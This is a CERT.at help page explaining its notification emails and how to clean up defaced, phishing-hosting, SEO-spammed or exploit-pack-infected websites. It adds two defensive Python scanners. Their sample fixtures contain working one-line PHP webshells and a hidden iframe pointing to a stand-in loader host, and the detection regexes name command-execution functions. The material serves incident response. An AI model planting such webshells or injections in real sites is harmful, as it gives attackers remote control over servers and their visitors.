Emails From Us

If you received an e-mail from us informing you about problems in your IT infrastructure, you can find all the relevant information here.

  • For ISPs
  • For everyone else

For ISPs

CERT.at receives threat intelligence for Austrian IP networks from a variety of sources. "Austrian" means all .at domains as well as servers located in Austria according to GeoIP data. As we receive data in different formats, we harmonize and deduplicate it before forwarding it. The format we use in the CSV files attached to our e-mails is described here.

Shadowserver

The NGO Shadowserver (https://www.shadowserver.org) is our biggest threat intelligence source. To check whether the data in our e-mail(s) comes from Shadowserver, look at the "feed" column in the CSV file. More detailed information about our feeds can be found here.

For everyone else

You received an e-mail from us and don't know how to proceed, or just want more information about the problem? You can find it here, along with possible solutions.

Defacements

In a defacement (also called "web graffiti") attackers change the appearance of your website. Often only the main page or a certain subpage is affected. In many cases the defaced site just displays the text "Hacked by" followed by the name of the culprit, greetings to their friends and a comment about the site's lack of security. Sometimes they also add a new background image or even embed audio or video files.

While these kinds of attacks are usually not dangerous to visitors, they may cause reputational damage to the defaced site.

If your website was defaced CERT.at recommends the following steps:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Clean up the actual defacement and restore the original state of the website.

If you are not sure how to execute these steps, CERT.at recommends contacting your IT service provider.

Phishing

Phishing is an attack that aims to steal credentials for online services such as banks or streaming platforms. To make it harder to trace the perpetrators behind phishing sites, criminals often break into legitimate websites and install their phishing kit there. The stolen credentials are then used to gain access to the victims' accounts at the target service.

If your website is hosting a phishing site CERT.at recommends the following steps:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Clean up the phishing kit and restore the original state of the website.

If you are not sure how to execute these steps, CERT.at recommends contacting your IT service provider.

Fake Pharmacy Hack

In a fake pharmacy hack attackers break into a website and place certain keywords into its HTML files. These keywords are indexed by search engines such as Google or DuckDuckGo but remain invisible to visitors.

Commonly the keywords are "cialis", "viagra", etc., i.e. alleged potency-enhancing drugs, which make the affected site look like a pharmacy shop to search engines. Once the search engines have been "convinced", the criminals redirect requests that arrive via a search engine result to (fake) shops under their control. From this point onwards, all visitors who find the website on a search engine and click on the result are forwarded to the fake shop instead of the real website. Users who access the website directly by entering the URL in their browser (or using a bookmark) are not affected, which is why site owners usually do not notice the problem themselves; to reproduce it, open your site from a search engine result rather than from a bookmark.

If your website is the victim of a fake pharmacy hack CERT.at recommends the following:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Remove the keywords from all HTML files and restore the original state of the website.

If you are not sure how to execute these steps, CERT.at recommends contacting your IT service provider.

Search Engine Ranking Hack

One of the metrics search engines use to determine the "importance" of a website is the number of other websites linking to it: the more links, the more important the site is deemed to be. In a search engine ranking hack, criminals try to exploit this behaviour by breaking into other websites and placing a large number of links to their own websites there. These links are usually hidden so that a casual observer does not notice them.

If your website has fallen victim to a search engine ranking hack CERT.at recommends the following actions:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Remove the links from all HTML files and restore the original state of the website.

If you are not sure how to execute these steps, CERT.at recommends contacting your IT service provider.
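The fake pharmacy hack and the search engine ranking hack leave the same trace in the HTML: content that is present in the source but styled so that visitors never see it. The script below is an added example, not CERT.at's tooling, that walks a web root and reports hidden keyword stuffing, hidden links to other hosts and, as a generalisation of the same idea, zero-size or hidden iframes, which attackers hide in the same way. The keyword list, the inline-style patterns, the site host www.example.at and the two sample pages (one clean, one infected) are constructed assumptions.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed keyword list for fake-pharmacy keyword stuffing; extend it with your own findings.
SPAM_KEYWORDS = ("viagra", "cialis", "levitra", "pharmacy")

# Inline styles attackers use to keep injected content invisible to human visitors.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?:px)?\s*(?:;|$)"
    r"|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)

# Elements without an end tag; they must not be pushed on the open-element stack.
VOID_TAGS = {"area", "base", "br", "col", "hr", "img", "input", "link", "meta", "source"}


class HiddenContentScanner(HTMLParser):
    """Parses one HTML document and records hidden spam text, hidden links and hidden iframes."""

    def __init__(self, path, site_host):
        super().__init__()
        self.path = path
        self.site_host = site_host.lower()
        self.stack = []       # (tag, hidden) per open element; hidden is inherited from ancestors
        self.findings = []

    def _in_hidden(self):
        return bool(self.stack) and self.stack[-1][1]

    def _report(self, kind, detail):
        self.findings.append({"file": self.path, "kind": kind, "detail": detail})

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = (self._in_hidden()
                  or bool(HIDDEN_STYLE.search(a.get("style") or ""))
                  or "hidden" in a)            # the HTML5 boolean 'hidden' attribute
        if tag == "a" and hidden:
            host = (urlparse(a.get("href") or "").hostname or "").lower()
            if host and host != self.site_host:   # hidden link pointing away from our own site
                self._report("hidden-link", a.get("href"))
        if tag == "iframe" and (hidden or a.get("width") == "0" or a.get("height") == "0"):
            self._report("hidden-iframe", a.get("src") or "")
        if tag not in VOID_TAGS:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open element; tolerates sloppy HTML with missing end tags.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if self._in_hidden():
            hits = [k for k in SPAM_KEYWORDS if k in data.lower()]
            if hits:
                self._report("hidden-keywords", ",".join(hits))


def scan_tree(root, site_host, exts=(".html", ".htm", ".php")):
    """Scans every HTML/PHP file below root; returns a list of finding dicts."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        dirs.sort()
        for name in sorted(files):
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                scanner = HiddenContentScanner(os.path.relpath(path, root), site_host)
                scanner.feed(fh.read())
                scanner.close()
            findings.extend(scanner.findings)
    return findings


# Constructed sample pages: a clean home page and a page with injected hidden content.
CLEAN_PAGE = """<html><head><title>Bakery</title></head>
<body><h1>Welcome</h1><p>Fresh bread daily. <a href="https://www.example.at/menu">Menu</a></p></body></html>"""

INFECTED_PAGE = """<html><head><title>Bakery</title></head>
<body><h1>Welcome</h1>
<div style="display:none">Buy cheap viagra and cialis online
  <a href="http://pills.example.net/order">order now</a></div>
<div style="position:absolute;left:-9999px"><a href="http://casino.example.org/">best casino</a></div>
<iframe src="http://loader.example.net/x" width="0" height="0"></iframe>
<p>Fresh bread daily.</p></body></html>"""


def build_sample(root):
    """Writes the constructed sample pages below root."""
    os.makedirs(os.path.join(root, "blog"), exist_ok=True)
    with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_PAGE)
    with open(os.path.join(root, "blog", "page.html"), "w", encoding="utf-8") as fh:
        fh.write(INFECTED_PAGE)


def scan_sample():
    """Builds the sample in a temporary directory and scans it; returns the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return scan_tree(root, "www.example.at")


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['file']}: {f['kind']} -> {f['detail']}")
```

Run it against a copy of the web root with your own host name. It only looks at inline styles and attributes, so content hidden via a class defined in a stylesheet or via JavaScript will be missed; compare the page as fetched with a search-engine referrer against a direct fetch to catch the redirect variant.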

Exploit Packs

CERT.at uses the label "exploit pack" for any kind of malware that is pushed to and executed on a user's PC when they visit a website.

If an exploit pack is found on your website, this indicates that criminals have gained access to it and are abusing it to spread malware.

CERT.at recommends the following steps for mitigation:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Remove the injected code that delivers the malware from all affected files and restore the original state of the website.

If you are not sure how to execute these steps, CERT.at recommends contacting your IT service provider.
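Step 2 of every procedure on this page (defacement, phishing, fake pharmacy hack, search engine ranking hack, exploit pack) asks you to check the webserver for backdoors. The script below is an added example, not CERT.at's tooling, showing one practical way to do that on a PHP site: it flags PHP files containing classic webshell constructs, PHP files in directories that should only hold uploads or caches, and any PHP file modified within the last 30 days. The indicator rules, the directory list and the four sample files mimicking a WordPress tree (three planted backdoors and one clean plugin that must not be flagged) are constructed assumptions.

```python
import os
import re
import tempfile
import time

# Constructed indicator rules: a name and a regex applied to each PHP file's source.
RULES = [
    ("eval-of-decoded-payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("command-exec-from-request",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("variable-function-from-request",
     re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I)),
    ("preg_replace-e-modifier",
     re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e['\"]", re.I)),
]
# Directories that should hold data only; executable PHP there is a classic dropper location.
NO_PHP_DIRS = ("wp-content/uploads/", "cache/", "tmp/")


def hunt_backdoors(root, since_days=30):
    """Returns flagged PHP files below root, sorted by path, with the rules they tripped."""
    cutoff = time.time() - since_days * 86400
    flagged = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            hits = [rule for rule, rx in RULES if rx.search(src)]
            if any(rel.startswith(d) or ("/" + d) in rel for d in NO_PHP_DIRS):
                hits.append("php-in-upload-or-cache-dir")
            recent = os.stat(path).st_mtime >= cutoff   # attackers' files are usually the newest ones
            if hits or recent:
                flagged.append({"file": rel, "rules": hits, "recent": recent})
    return sorted(flagged, key=lambda f: f["file"])


# Constructed sample tree: relative path -> (PHP source, age of the file in days).
SAMPLE_FILES = {
    "wp-content/plugins/clean/clean.php": ("<?php\nfunction clean_hello() { return 'hello'; }\n", 400),
    "wp-content/uploads/2023/img.php": ('<?php @eval(base64_decode($_POST["k"])); ?>\n', 0),
    "wp-includes/class-cache.php": ("<?php\nclass Cache {}\n// appended by the attacker:\npassthru($_GET['cmd']);\n", 2),
    "wp-content/themes/shop/footer.php": ("<?php /* theme footer */ ?>\n</body>\n<?php $_REQUEST['f']($_REQUEST['a']); ?>\n", 10),
}


def build_sample(root):
    """Writes the constructed sample files below root and back-dates their mtimes."""
    now = time.time()
    for rel, (src, age) in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(src)
        t = now - age * 86400
        os.utime(path, (t, t))


def hunt_sample():
    """Builds the sample in a temporary directory and hunts in it; returns the flagged files."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return hunt_backdoors(root)


if __name__ == "__main__":
    for f in hunt_sample():
        print(f"{f['file']}: rules={f['rules']} recent={f['recent']}")
```

Treat the output as a starting list rather than proof: a legitimate plugin can trip a rule, and a careful attacker can avoid all of them, so also compare the tree against a known-good copy (or the vendor's original package) and review the webserver access log around the modification times of the flagged files.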